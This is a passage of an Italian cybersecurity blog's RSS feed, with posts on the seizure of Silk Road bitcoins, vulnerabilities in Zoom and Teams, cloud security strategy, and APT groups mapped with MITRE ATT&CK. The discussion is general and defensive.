&lt;p&gt;In piena battaglia per le elezioni presidenziali 2020, la notizia del trasferimento di &lt;strong&gt;69369 Bitcoin&lt;/strong&gt; ha destato subito attenzione. Si tratta di circa &lt;strong&gt;un miliardo di dollari&lt;/strong&gt; e si sapeva che il Wallet di provenienza fosse precedentemente associato proprio a Silk Road. Gli analisti della &lt;em&gt;blockchain&lt;/em&gt; che hanno segnalato la transazione, hanno anche sottolineato come si trattasse del quarto più grande wallet a livello mondiale e che fosse dormiente dal 2015.&lt;/p&gt;

&lt;p&gt;Non tutti sanno che un wallet Bitcoin non può essere aperto da nessuno, autorità comprese, senza il possesso della chiave privata con cui è stato creato. Una delle cose a cui fare maggiore attenzione quando si maneggiano criptovalute è proprio &lt;strong&gt;evitare di perdere la chiave privata&lt;/strong&gt; altrimenti il contenuto del wallet rimarrà per sempre all’interno del sistema senza possibilità di essere estratto. Un limbo tecnologico per valute virtuali.&lt;/p&gt;

&lt;p&gt;Altro dettaglio: Bitcoin non è completamente anonimo, chi paga e chi riceve il denaro devono sapere &lt;strong&gt;gli indirizzi dei loro rispettivi wallet&lt;/strong&gt; e ogni singola transazione è scritta su un registro pubblico: la &lt;em&gt;“ledger”&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/silk-road/silk-road-bitcoin1.jpg&#34; alt=&#34;silk-road-bitcoin&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;Dipartimento di Giustizia degli Stati Uniti&lt;/strong&gt; &lt;a href=&#34;https://www.justice.gov/usao-ndca/pr/united-states-files-civil-action-forfeit-cryptocurrency-valued-over-one-billion-us&#34;&gt;ha dichiarato di essere entrato in possesso del denaro&lt;/a&gt;, una parte dei 600000 Bitcoin che si stima la piattaforma abbia guadagnato negli anni di attività (ndr: allora un BTC valeva molto meno di oggi).
La domanda che in tanti si sono posti è come abbiano fatto: sono effettivamente riusciti a violare la blockchain o un wallet?&lt;/p&gt;

&lt;p&gt;All’interno del Dipartimento di Giustizia esiste un &lt;strong&gt;apposito nucleo investigativo&lt;/strong&gt; il cui compito principale è quello di seguire i flussi di denaro, anche delle criptovalute. &lt;em&gt;Follow-the-money&lt;/em&gt;, del resto, è una strategia molto efficace contro il crimine organizzato.
Purtroppo però non sono stati loro a forzare il wallet, hanno però rintracciato chi aveva precedentemente forzato Silk Road e instradato parte delle transazioni verso (almeno) due wallet che lui stesso controllava. Riuscì a farlo senza hackerare il wallet in sè, ma il meccanismo (detto la lavatrice) che Silk Road utilizzava per non dare ai compratori i codici reali dei suoi wallet; altrimenti sarebbe stato facile per le autorità fingersi acquirenti per avere gli indirizzi (ossia le chiavi pubbliche).&lt;/p&gt;

&lt;p&gt;Il meccanismo in questione, chiamato &lt;em&gt;“tumbler”&lt;/em&gt; inviava tutte le transazioni attraverso una serie complessa e semi-randomica di transazioni fantoccio. Come detto, tutte le transazioni sono scritte nel registro pubblico con chiave pubblica sorgente, quella di destinazione e il valore. Quindi non è sufficiente spostare lo stesso valore su un terzo wallet in quanto sarebbe facilmente rintracciabile. No, l’ingegnoso sistema di lavanderia prevedeva di &lt;strong&gt;separare la transazione iniziale&lt;/strong&gt; in moltissime di importo diverso e di &lt;strong&gt;diluirle nel tempo&lt;/strong&gt;. La ledger è unica e memorizza in ordine cronologico: un numero indefinitamente grande di transazioni con valori casuali sarebbe il classico ago nel pagliaio.&lt;/p&gt;

&lt;p&gt;La nostra tesi è che &lt;strong&gt;l’autore fosse complice del meccanismo&lt;/strong&gt;: lo stesso sito Silk Road pubblicizzava l’efficacia del loro “tumbler” indicando che fosse stato scritto da zero da un team di talentosi sviluppatori con molta esperienza. Uno di loro deve aver pensato di emulare qualche tecnico bancario degli anni ottanta, quando si informatizzarono le transazioni e nell’euforia del momento non si fece molta attenzione al terzo e quarto decimale. Deduzione dovuta alle evidenze investigative che rilevarono che Ulbricht fosse al corrente dell’identità di “Mr.X” e che lo avesse intimato di restituite il malloppo. Del resto il 10% del totale non è esattamente un decimale.&lt;/p&gt;

&lt;p&gt;Mr.X non fece nulla di tutto questo fino al 5 novembre 2020 quando firmò un accordo con il Dipartimento di Giustizia per la &lt;strong&gt;restituzione del wallet&lt;/strong&gt;. Evidentemente gli investigatori devono essere riusciti a ricostruire la catena delle transazioni e a dare un nome a “Mr.X”.&lt;/p&gt;

&lt;p&gt;Follow-the-money funziona: ci hanno messo del tempo ma, alla fine, sono rientrati in possesso
di un miliardo di dollari.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Le piattaforme di videoconference come vettore di attacco</title>
         <link>https://blog.cybergon.com/posts/le-piattaforme-di-videoconference-come-vettore-di-attacco/</link>
         <pubDate>Fri, 11 Sep 2020 11:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Sara Loprete</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/le-piattaforme-di-videoconference-come-vettore-di-attacco/</guid>
         <description>

&lt;p&gt;E’ il 2003. Sta entrando nel mercato uno dei tool più popolari di sempre, che darà poi via ad una adozione graduale di strumenti per videochiamate in tutto il mondo: Skype.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/videoconference-security/videoconference-vettore-attacco.jpg&#34; alt=&#34;videoconference-vettore-attacco&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Nel 2020 strumenti di collaboration e videoconference sono all’ordine del giorno per chi lavora in ambienti non strettamente produttivi. Da Marzo 2020 in particolare, quando il mondo ha improvvisamente scoperto le &lt;strong&gt;potenzialità del digitale&lt;/strong&gt;, inizia una corsa a prendere confidenza con diversi strumenti: Zoom, Microsoft Teams, Google Meet, Webex Meetings, ecc.
Da un’indagine &lt;em&gt;Statista&lt;/em&gt; il 59% delle aziende non ne aveva mai usufruito.
Questo fenomeno, in breve, assume dimensioni tali da suscitare l’attenzione di tutti.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/videoconference-security/videoconference-platform-usage.png&#34; alt=&#34;videoconference-platform-usage&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Con in testa l’obiettivo di far funzionare le comunicazioni da remoto, molte aziende hanno &lt;strong&gt;sottovalutato il cambio di paradigma della security&lt;/strong&gt;. Fino ad allora erano ragionevolmente protette dai loro firewall e da connessioni iniziate e terminate in ambienti di fiducia.
I castelli medioevali hanno dovuto aprire le porte al commercio dell’era moderna e, in breve, hanno scoperto che quelle mura, loro baluardo per secoli, sono diventate inutili.&lt;/p&gt;

&lt;p&gt;Nel momento in cui si estende la propria infrastruttura e il perimetro aziendale perde di significato, senza un’adeguata strategia di &lt;strong&gt;rilevazione e risposta delle minacce&lt;/strong&gt;, i rischi sono svariati. Anche la stampa specializzata, attirata dal catastrofismo degli attacchi ransomware, non sta divulgando la moltitudine di pericoli in grado di compromettere l’operatività delle aziende.&lt;/p&gt;

&lt;p&gt;Tutti i &lt;strong&gt;servizi devono essere oggetto di attenzione&lt;/strong&gt;, comprese le piattaforme di collaborazione e videoconferenza.&lt;/p&gt;

&lt;p&gt;Zoom in particolare ha subito un boost notevole, diventando uno dei principali tool utilizzati in Italia con più di &lt;strong&gt;170.000 Daily Active Users&lt;/strong&gt; nel mese di marzo e &lt;a href=&#34;https://forbes.it/2020/09/02/zoom-vola-in-borsa-e-vale-piu-di-ibm-e-vmware-grazie-ai-numeri-di-bilancio/&#34;&gt;una crescita in borsa impressionante.&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/videoconference-security/zoom-daily-users.png&#34; alt=&#34;zoom-daily-users&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Non è stato solo l’utilizzo diffuso ad aver dato notorietà a questa piattaforma.
Zoom ha fatto parlare di sé anche per &lt;strong&gt;il numero e le tipologie di vulnerabilità&lt;/strong&gt;.&lt;/p&gt;

&lt;h3 id=&#34;vulnerabilità-e-rischi&#34;&gt;Vulnerabilità e rischi&lt;/h3&gt;

&lt;p&gt;Il problema più noto è stato il cosiddetto &lt;strong&gt;Zoom Bombing&lt;/strong&gt;, il fenomeno per cui persone non autorizzate riuscivano a intrufolarsi nelle videoconferenze altrui. Tecnicamente si parla di attacco &lt;em&gt;brute-force&lt;/em&gt;.
E’ stato anche il tweet di Boris Johnson, con &lt;em&gt;meeting ID&lt;/em&gt; e nomi dei ministri coinvolti esposti a destare preoccupazione per questa &lt;em&gt;misconfiguration&lt;/em&gt; di Zoom, per cui bastava avere il codice della riunione a nove cifre per entrare in una sala virtuale e fare potenzialmente ciò che si volesse.&lt;/p&gt;

&lt;p&gt;Gli impatti di un attacco come questo potrebbero variare &lt;strong&gt;dal furto di credenziali, all’accesso nei sistemi aziendali all’invio di contenuti e link malevoli&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/videoconference-security/zoom-id-meeting-boris-johnson.jpg&#34; alt=&#34;zoom-id-meeting-boris-johnson&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Non solo: durante l’arco di quest&amp;rsquo;anno sono state scoperte &lt;strong&gt;6 vulnerabilità di Zoom&lt;/strong&gt; di cui una RCE di livello critico sul &lt;em&gt;client Windows&lt;/em&gt;, vulnerabilità simile a quella scoperta nel 2019 per il client &lt;em&gt;MacOS&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Quest’ultima ha ricevuto aggiornamento solo a distanza di 4 giorni dalla scoperta, la causa di questo ritardo dalla &lt;em&gt;zero-day&lt;/em&gt; è da ricondurre al team di sviluppo di Zoom che non si è preoccupato di ascoltare i ricercatori che avevano segnalato il problema per tempo. Troppo presi con le nuove funzionalità.
Sfruttando questa vulnerabilità un Bad Actor può eseguire codice a privilegio utente su un client che sta effettuando una chiamata.
(Ref: &lt;a href=&#34;https://threatpost.com/unpatched-zoom-bug-rce/157317/&#34;&gt;https://threatpost.com/unpatched-zoom-bug-rce/157317/&lt;/a&gt;)&lt;/p&gt;

&lt;p&gt;Diversi attacchi sono andati a buon fine: solo ad aprile sono stati pubblicati nel darkweb username e password di ben &lt;strong&gt;2300 account Zoom&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Nemmeno Microsoft è esente dalla bellezza dell’imperfezione del codice.&lt;/p&gt;

&lt;p&gt;La vulnerabilità che ha portato agli &lt;em&gt;FCM Messages&lt;/em&gt; di Microsoft Teams è da ricondurre all’uso da parte degli sviluppatori Microsoft del &lt;em&gt;framework&lt;/em&gt; Firebase Cloud Messaging per l’invio delle notifiche su device android.
Questa vulnerabilità è stata scoperta dapprima attraverso la challenge #AdroidHackingMonth tenutasi a luglio e segnalata il 4 dello stesso mese.
Google non ha dato peso ha questa vulenerabilità finché non è stata sfruttata &lt;em&gt;“in the wild”&lt;/em&gt; prima con degli exploit di Hangouts e poi con Microsoft Teams. (Ref: &lt;a href=&#34;https://abss.me/posts/fcm-takeover/&#34;&gt;https://abss.me/posts/fcm-takeover/&lt;/a&gt;)&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/videoconference-security/microsoft-teams-vulnerability-1.jpg&#34; alt=&#34;microsoft-teams-vulnerability&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Questo genere di vulnerabilità hanno le carte in regola per &lt;strong&gt;portare ad attacchi mirati&lt;/strong&gt; e studiati per sfruttare proprio quelle falle di sistema.
Esistono migliaia di vulnerabilità come queste: ogni individuo, utilizzando questi strumenti rappresenta un obiettivo. La &lt;strong&gt;consapevolezza del rischio&lt;/strong&gt; da parte sua e dell’organizzazione rappresenta il &lt;strong&gt;primo meccanismo di difesa&lt;/strong&gt; contro i potenziali attacchi informatici, in caso contrario, invece, si trasforma nella vulnerabilità più fragile.&lt;/p&gt;

&lt;p&gt;Il Cyber crime &lt;a href=&#34;https://cybergon.com/blog/posts/cybercrime-e-cybersecurity-intelligence-come-leva-per-la-difesa-della-tua-organizzazione/&#34;&gt;agisce come un’industria&lt;/a&gt;: quando scorge un’opportunità non tarda a coglierla. Milioni di utenti che scaricano ed iniziano ad usare nuove piattaforme, sono senza ombra di dubbio una grande opportunità.&lt;/p&gt;

&lt;p&gt;È semplice comprendere perché sia importante proteggere le videocall da intrusioni esterne: dai contenuti sensibili di cui si discute, alle presentazioni condivise, alle immagini di casa. Un po’ più complesso sapere che, prima o poi, capiterà a tutti se non si investe nelle tecnologie e nelle competenze necessarie per proteggersi.&lt;/p&gt;

&lt;p&gt;&lt;a href=&#34;http://bit.ly/speed-date-cybergon&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/videoconference-security/speed-date.PNG&#34; alt=&#34;speed-date&#34; /&gt;&lt;/a&gt;&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Cloud e Security: adottare una strategia di difesa efficace</title>
         <link>https://blog.cybergon.com/posts/cloud-e-security-adottare-una-strategia-di-difesa-efficace/</link>
         <pubDate>Tue, 08 Sep 2020 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cloud-e-security-adottare-una-strategia-di-difesa-efficace/</guid>
         <description>

&lt;p&gt;Tra le sfide che ogni azienda si trova o si troverà ad affrontare assumono un ruolo di primaria importanza l’adozione del cloud e la definizione di un piano concreto di security.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cloud-security/cloud-security.jpg&#34; alt=&#34;cloud-e-security&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Proteggere gli investimenti, la proprietà intellettuale, i propri asset e dati aziendali può realizzarsi soltanto attraverso un percorso continuativo che va adattato e migliorato nel tempo.&lt;/p&gt;

&lt;p&gt;Più è forte la spinta innovativa e la dinamicità dell’azienda, maggiore è il legame tra cloud e security: andiamo ad analizzare gli aspetti che compongono questa complessità e come è possibile affrontarli.&lt;/p&gt;

&lt;h2 id=&#34;cloud-e-security-strategia-di-difesa&#34;&gt;Cloud e Security: strategia di difesa&lt;/h2&gt;

&lt;p&gt;Storicamente, prima dell’utilizzo di servizi cloud, il reparto IT doveva occuparsi del proprio data center e di utenti che difficilmente si muovevano fuori dalla rete aziendale. Nel mercato italiano esistono ancora parecchie realtà che utilizzano questo layout.&lt;/p&gt;

&lt;p&gt;L’approccio consolidato nel tempo è quello di:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;difendere il perimetro della rete;&lt;/li&gt;
&lt;li&gt;difendere il contenuto della rete;&lt;/li&gt;
&lt;li&gt;difendere i dispositivi, anche in mobilità.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Questo piano assomiglia molto alla difesa di un fortino, in cui è necessario proteggere i confini e verificare che non ci siano brecce nella protezione.&lt;/p&gt;

&lt;p&gt;Negli anni gli strumenti informatici e le soluzioni di cyber security hanno raggiunto un livello di maturità che permette di definire come maturo l’approccio alla difesa basato su:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Tecnologia di difesa&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;sistemi IPS e IDS;&lt;/li&gt;
&lt;li&gt;firewall perimetrali, meglio se di nuova generazione;&lt;/li&gt;
&lt;li&gt;antivirus e antimalware con evoluzione sui sistemi di EDR.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Soluzioni e servizi di Cyber Security&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;raccolta dei log degli apparati all’interno di un SIEM;&lt;/li&gt;
&lt;li&gt;generazione di alert verso un SOC;&lt;/li&gt;
&lt;li&gt;monitoraggio continuo del traffico di rete;&lt;/li&gt;
&lt;li&gt;monitoraggio continuo delle vulnerabilità e relative remediation;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Best Practice&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;segregazione delle reti;&lt;/li&gt;
&lt;li&gt;autenticazione centralizzata;&lt;/li&gt;
&lt;li&gt;definizione puntuale dei permessi degli utenti.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Con l’adozione dei servizi offerti dai cloud provider questo approccio non è più sufficiente.&lt;/p&gt;

&lt;p&gt;Il perimetro cambia e in alcune situazioni diventa effimero, le applicazioni e i servizi a disposizione degli utenti devono essere raggiungibili ovunque.&lt;/p&gt;

&lt;p&gt;La complessità aumenta se ragioniamo su soluzioni multi-cloud e hybrid-cloud: da una parte dobbiamo validare gli approcci su fornitori differenti e dall’altra dobbiamo gestire il legame tra il data center locale e i servizi cloud.&lt;/p&gt;

&lt;h2 id=&#34;cloud-e-security-shared-responsibility&#34;&gt;Cloud e Security: shared responsibility&lt;/h2&gt;

&lt;p&gt;In un modello tradizionale basato su infrastruttura on-premise la responsabilità di attuare un efficace piano di security e rispondere prontamente alle minacce è totalmente in carico all’azienda.
Con l’accesso ai servizi cloud questo paradigma cade ed è necessario chiarire in quali casi la responsabilità è del cloud service provider (CSP Responsibility) e in quali altri è del cliente (Customer Responsibility).&lt;/p&gt;

&lt;p&gt;Questa struttura non è fissa, ma varia in base alla tipologia di servizio che viene acquisito dal cloud provider.&lt;/p&gt;

&lt;p&gt;Gartner analizza i 3 modelli classici dei servizi cloud:
1. IaaS: in cui il cliente ha spostato sul cloud provider la responsabilità dell’infrastruttura fisica e della componente di virtualizzazione;
2. PaaS: in cui il CSP copre un ambito più ampio fino ai servizi di Runtime e Middleware;
3. SaaS: in cui il cliente ha delegato anche la gestione delle applicazioni.&lt;/p&gt;

&lt;p&gt;Rimane però chiaro un aspetto fondamentale: il cliente avrà sempre la responsabilità delle persone e di tutti gli aspetti legati all’identità digitale e ai dati utilizzati da persone e applicazioni.&lt;/p&gt;

&lt;p&gt;È quindi utile analizzare l’interpretazione del modello di shared responsibility di due cloud service provider (Azure e AWS).
Microsoft pone particolare attenzione alla tipologia di servizio erogato (IaaS, PaaS, SaaS) sulla falsa riga di Gartner.&lt;/p&gt;

&lt;p&gt;Aggiunge però due aspetti:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;divide la gestione dell’infrastruttura di identity dalla gestione degli account e identità;&lt;/li&gt;
&lt;li&gt;esplicita che la gestione dei device è sempre in carico al cliente.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cloud-security/shared-responsibility-model.png&#34; alt=&#34;shared-responsibility-model&#34; /&gt;&lt;/p&gt;

&lt;p&gt;AWS, invece, esprime lo stesso concetto con una visione più legata al layout infrastrutturale.&lt;/p&gt;

&lt;p&gt;Interessante l’idea del contenuto e contenitore:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;il contenitore (Responsibility for security OF the cloud) è in carico ad AWS;&lt;/li&gt;
&lt;li&gt;il contenuto (Responsibility for security IN the cloud) è sempre in carico al cliente;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cloud-security/shared-responsibility-model-aws.jpg&#34; alt=&#34;shared-responsibility-model-aws&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;approccio-all-adozione-del-cloud&#34;&gt;Approccio all&amp;rsquo;adozione del cloud&lt;/h2&gt;

&lt;p&gt;Per avere una strategia di successo per l’adozione del cloud è necessario procedere in modo graduale: esistono molti esempi di aziende che hanno adottato un approccio “big-bang”, fallendo e pagando duramente tale errore.&lt;/p&gt;

&lt;p&gt;L’adozione del cloud non è quindi un processo statico, ma varia nel tempo.&lt;/p&gt;

&lt;p&gt;Applicando la metodologia DevSecOps, è necessario utilizzare un modello ricorsivo, diviso in tre fasi:
1. secure design: gli aspetti di security devono essere analizzati fin dalle prime fasi del disegno architetturale in quanto vitali per i passi successivi. Il design può essere eseguito top-down, scendendo progressivamente di livello di dettaglio;
2. secure build: l’implementazione di quanto definito deve essere eseguita monitorando ogni step per evitare che mis-configuration generino incident di sicurezza. Prima di rilasciare in produzione qualunque soluzione è necessario eseguire un security assessment per risolvere tempestivamente eventuali vulnerabilità;
3. manage security: è necessario monitorare in mondo continuativo l’utilizzo di tali servizi e le nuove minacce. In questo ambito bisogna continuamente analizzare il flusso di informazioni, raccogliere i log e centralizzarli in un SIEM, eseguire costantemente security assessment ed eventualmente triggerare il processo di secure design.&lt;/p&gt;

&lt;h2 id=&#34;cloud-e-security-quali-sono-le-priorità&#34;&gt;Cloud e Security: quali sono le priorità&lt;/h2&gt;

&lt;p&gt;Riportiamo la piramide di Gartner che schematizza i temi che devono essere affrontati per poter adottare il cloud con un crescente grado di sicurezza.&lt;/p&gt;

&lt;p&gt;È chiaro che è necessario analizzare in modo prioritario i temi che stanno alla base e aggiungere componenti con il crescere della maturità e adozione.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cloud-security/cloud-services-protection.png&#34; alt=&#34;cloud-services-protection&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Analizziamo, quindi, i sei aspetti indispensabili da affrontare.&lt;/p&gt;

&lt;h3 id=&#34;secure-network&#34;&gt;Secure Network&lt;/h3&gt;

&lt;p&gt;L’approccio da utilizzare per configurare i vari tenant e applicazioni cloud è quello di segregare il più possibile il network tra i vari ambienti per ridurre il rischio che la compromissione di un sistema possa impattare anche altri sistemi.&lt;/p&gt;

&lt;p&gt;L’utilizzo di VPN risolve le necessità di comunicazione, in quanto il traffico passa su canale sicuro, ma può essere ospitato su tipologie diverse di connettività (internet, dedicated ecc.)&lt;/p&gt;

&lt;p&gt;Un “must” deve essere:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;la segregazione delle reti di produzione on-premise da quelle del cloud;&lt;/li&gt;
&lt;li&gt;autorizzare solo le comunicazioni necessarie.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&#34;identity-management&#34;&gt;Identity Management&lt;/h3&gt;

&lt;p&gt;La sicurezza nel cloud è basata sulla protezione dell’identità e in modo secondario sulla protezione del perimetro.&lt;/p&gt;

&lt;p&gt;Per questo motivo è necessario adottare sistemi di identity management avanzati che permettano di centralizzare le credenziali, abilitare il single-sign on e gestire le autorizzazioni per applicazione.&lt;/p&gt;

&lt;p&gt;Una corretta profilazione degli utenti sta alla basa del buon funzionamento di ogni sistema di identity management.&lt;/p&gt;

&lt;p&gt;Fortemente consigliata l’adozione di soluzioni di MFA (multi factor authentication) per risolvere i limiti umani della gestione delle complessità delle password e rimuovere i rischi di brute force attack.&lt;/p&gt;

&lt;p&gt;Porre attenzione agli amministratori dei sistemi che devono avere un livello di sicurezza nell’autenticazione maggiore rispetto ad un utente base (es. password complessa per gli utenti standard e MFA per gli amministratori).&lt;/p&gt;

&lt;h3 id=&#34;access-management&#34;&gt;Access Management&lt;/h3&gt;

&lt;p&gt;I sistemi di Rule Base Access Control (RBAC) permettono di definire in modo puntuale le autorizzazioni di ogni singolo utente e in modo granulare ogni singola tipologia di attività permessa.&lt;/p&gt;

&lt;p&gt;Vale la regola che le autorizzazioni devono essere cucite in modo sartoriale sulle esigenze dell’utente, monitorando in modo costante le attività eseguite e rimuovendo eventuali autorizzazioni non necessarie.&lt;/p&gt;

&lt;h3 id=&#34;log-analyze&#34;&gt;Log &amp;amp; Analyze&lt;/h3&gt;

&lt;p&gt;Con la dinamicità del cloud, bisogna attivare il logging di tutti i componenti utilizzati, del traffico che viene generato tra di loro e verso il data center cliente.&lt;/p&gt;

&lt;p&gt;Tali log vanno raccolti utilizzando gli strumenti del CSP che ne fa una prima scrematura e poi centralizzarli in un SIEM per poter applicare regole di correlazione e generare allarmi verso il SOC.&lt;/p&gt;

&lt;p&gt;I vendor di SIEM più noti hanno creato dei connettori per i vari componenti del cloud con già applicate le regole base di correlazione.&lt;/p&gt;

&lt;p&gt;Non è però semplice definire uno standard, in quanto ogni azienda può approcciare i servizi cloud in modo differente.&lt;/p&gt;

&lt;h3 id=&#34;continuous-assessment&#34;&gt;Continuous Assessment&lt;/h3&gt;

&lt;p&gt;Non possiamo fidarci del design iniziale e dell’implementazione eseguita prima di rilasciare la soluzione in produzione.&lt;/p&gt;

&lt;p&gt;È quindi importante monitorare costantemente la cloud security posture. Esistono diverse soluzioni sul mercato (CSPM Tools), spesso non fornite dal cloud service provider, che confrontano le policy definite con l’effettiva configurazione presente sul tenant.&lt;/p&gt;

&lt;p&gt;Visto che “tutto è software”, il rischio di mis-configuration è molto alto.&lt;/p&gt;

&lt;p&gt;All’interno di tali tools ci sono profili standard forniti dal vendor, ma è possibile personalizzare la matrice di confronto e i controlli da eseguire.&lt;/p&gt;

&lt;h3 id=&#34;encrypt-if-it-s-possible&#34;&gt;Encrypt if it&amp;rsquo;s possible&lt;/h3&gt;

&lt;p&gt;La responsabilità della sicurezza dei dati rimane sempre in carico al cliente ed è per questo consigliato attivare le funzionalità di encryption native nelle applicazioni e basarsi su un sistema avanzato di gestione delle chiavi.&lt;/p&gt;

&lt;p&gt;In questo modo, eventuali compromissioni del cloud provider o del canale di comunicazione non permettono ai cyber criminali di accedere ai dati aziendali.&lt;/p&gt;

&lt;h2 id=&#34;raccomandazioni&#34;&gt;Raccomandazioni&lt;/h2&gt;

&lt;p&gt;L’utilizzo dei servizi cloud è ormai uno standard di mercato. I Cloud Service Provider ampliano costantemente le funzionalità offerte e tale processo deve essere continuamente gestito.&lt;/p&gt;

&lt;p&gt;Ad esempio, durante l’emergenza Covid è esploso l’utilizzo degli strumenti di collaborazione cloud (Teams, Zoom, Google Cloud), senza però una governance centralizzata.&lt;/p&gt;

&lt;p&gt;L’adozione graduale del cloud è fondamentale, ma è chiaro che non tutte le decisioni e le scelte passano dal reparto IT dell’azienda (Shadow IT).&lt;/p&gt;

&lt;p&gt;Per questo motivo è necessario un monitoraggio costante dei servizi utilizzati dagli utenti per correggere il design o chiudere falle di sicurezza in modo tempestivo.&lt;/p&gt;

&lt;p&gt;Non è più possibile approcciare la security proteggendo il perimetro in quanto i servizi sono sempre più ibridi e usati in mobilità.&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;👉 &lt;a href=&#34;https://www.cybersecurity360.it/soluzioni-aziendali/cloud-e-security-strategie-di-difesa-e-raccomandazioni-per-la-scelta-del-servizio-giusto/&#34;&gt;Il seguente articolo è stato scritto per Cybersecurity360.it&lt;/a&gt; 👈&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Advance Persistent Threat: i nuovi Cyber criminali</title>
         <link>https://blog.cybergon.com/posts/advance-persistent-threat-i-nuovi-cyber-criminali/</link>
         <pubDate>Thu, 06 Aug 2020 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Lucchina</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/advance-persistent-threat-i-nuovi-cyber-criminali/</guid>
         <description>

&lt;p&gt;Nelle ultime settimane &lt;em&gt;Evil Corp&lt;/em&gt; è emersa all’attenzione del grande pubblico per l’attacco a Garmin e il (probabile) &lt;a href=&#34;https://www.businessinsider.com/garmin-paid-multimillion-dollar-ransom-to-hackers-report-2020-8?IR=T&#34;&gt;riscatto di 10 milioni di dollari che ha intascato&lt;/a&gt;. Si tratta di un gruppo di Cyber criminali, presumibilmente operanti dal territorio russo, che si districa tra &lt;strong&gt;attacchi informatici&lt;/strong&gt; e &lt;strong&gt;attività di intelligence&lt;/strong&gt;. L’intreccio che queste due attività assumono ha creato una nuova categoria di soggetti.&lt;/p&gt;

&lt;p&gt;Le Cyber Defense Agency occidentali definiscono questi gruppi con una sigla, &lt;strong&gt;APT - Advance Persistent Threat&lt;/strong&gt;, che indica tre caratteristiche: hanno capacità avanzate, risorse finanziarie per perpetuare nel tempo le minacce e sono pericolosi.
Si tratta degli attori che non seguono il &lt;a href=&#34;https://cybergon.com/blog/posts/averagesecurity/&#34;&gt;copione di «Avarage Security»&lt;/a&gt;, ma operano con obiettivi specifici, preferendo le grandi organizzazioni e con un orizzonte geopolitico globale.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/apt/apt-img1.png&#34; alt=&#34;apt&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Solitamente hanno &lt;strong&gt;un duplice obiettivo&lt;/strong&gt;: fare soldi e ottenere informazioni. I due scopi si intrecciano in continuazione e, a seconda delle necessità, uno ottiene priorità sull’altro. Esiste però uno schema comune: &lt;strong&gt;prima si esfiltrano le informazioni e poi si cerca di monetizzare con la loro vendita o la richiesta di un riscatto&lt;/strong&gt;. Esiste anche l’ipotesi che, a volte, lavorino su mandato di enti governativi, in tal caso si può supporre che le informazioni le vendano a loro.
Si differenziano dai &amp;ldquo;Cyber criminali comuni&amp;rdquo; in quanto non utilizzano risorse già disponibili ma sono in grado di crearne di proprie,come potrebbe fare una grande organizzazione.&lt;/p&gt;

&lt;h2 id=&#34;mitre-att-ck-comprendere-il-fenomeno-per-combatterlo&#34;&gt;MITRE ATT&amp;amp;CK: comprendere il fenomeno per combatterlo&lt;/h2&gt;

&lt;p&gt;Per una comprensione più tecnica del fenomeno, il framework di riferimento è il &lt;a href=&#34;https://attack.mitre.org/&#34;&gt;MITRE ATT&amp;amp;CK&lt;/a&gt;, sviluppato sulla base dell’osservazione delle tattiche e delle tecniche di attacco. Il MITRE è una associazione no-profit che si occupa di &lt;strong&gt;valutazione delle tecnologie&lt;/strong&gt;; solo per caso ha due sedi: una all’interno di uno dei più importanti centri scolastici per la formazione tecnologica e una a fianco della National Security Agency.  Uno degli obiettivi è mappare le attività dei diversi gruppi operanti nell’ombra del Cybercrime per il loro comportamento, classificando l’uso di tecniche omogenee e mappandone l’evoluzione nel tempo.&lt;/p&gt;

